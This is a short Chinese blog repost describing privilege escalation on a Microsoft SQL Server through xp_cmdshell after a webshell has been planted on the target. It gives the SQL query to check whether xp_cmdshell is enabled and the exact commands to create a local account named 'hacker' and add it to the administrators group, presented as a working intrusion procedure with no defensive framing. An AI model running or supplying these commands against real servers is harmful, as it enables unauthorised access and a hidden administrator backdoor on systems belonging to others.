mssqlserver xp_cmdshell提权

来源:互联网 发布:云计算产业链市场份额 编辑:程序博客网 时间:2024/05/20 11:20

首先把大马上传上去,再webshell.asp上进行操作

进行端口扫描,发现有1433端口存在,说明有mssql数据库

在sql操作命令处,进行输入命令:select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell‘ 查看xp_cmdshell是否开启

添加系统账号:exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

加入管理员组:exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'


原创粉丝点击